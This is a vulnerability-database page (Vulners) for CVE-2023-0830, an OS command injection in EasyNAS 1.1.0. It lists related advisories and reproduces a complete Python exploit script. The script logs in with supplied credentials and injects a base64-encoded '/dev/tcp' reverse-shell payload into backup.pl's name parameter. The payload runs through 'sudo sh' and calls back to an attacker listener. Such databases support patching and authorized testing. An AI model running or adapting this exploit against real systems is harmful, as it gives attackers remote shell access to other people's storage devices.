Vulners
Lucene search
EasyNas 1.1.0 - OS Command Injection Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Easynas | 29 Jun 202315:23 | – | githubexploit |
 | The vulnerability of the /backup.pl component of the EasyNAS operating system’s network storage solution, allowing a hacker to execute arbitrary commands. | 15 Nov 202300:00 | – | bdu_fstec |
 | CVE-2023-0830 | 14 Feb 202320:41 | – | circl |
 | EasyNAS 操作系统命令注入漏洞 | 14 Feb 202300:00 | – | cnnvd |
 | CVE-2023-0830 | 14 Feb 202316:13 | – | cve |
 | CVE-2023-0830 EasyNAS backup.pl system os command injection | 14 Feb 202316:13 | – | cvelist |
 | EasyNas 1.1.0 - OS Command Injection | 6 Apr 202300:00 | – | exploitdb |
 | CVE-2023-0830 | 14 Feb 202317:15 | – | nvd |
 | CVE-2023-0830 | 14 Feb 202317:15 | – | osv |
 | EasyNas 1.1.0 Command Injection | 6 Apr 202300:00 | – | packetstorm |
10
# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Exploit Author: Ivan Spiridonov ([email protected])
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#!/usr/bin/python3
import requests
import sys
import base64
import urllib.parse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
sys.exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])
# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload
payload = urllib.parse.quote(payload)
# Create the login data
login_data = {
'usr':user,
'pwd':password,
'action':'login'
}
# Create a session
session = requests.Session()
# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)
# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
print("Unsuccessful login")
sys.exit()
else:
print("Login successful")
# send the exploit request
timeout = 3
try:
exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
if exploit_response.status_code != 200:
print("[+] Everything seems ok, check your listener.")
else:
print("[-] Exploit failed, system is patched or credentials are wrong.")
except requests.exceptions.ReadTimeout:
print("[-] Everything seems ok, check your listener.")
sys.exit()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.16.3 - 8.8
CVSS 45.3
CVSS 26.5
CVSS 36.3
EPSS0.38532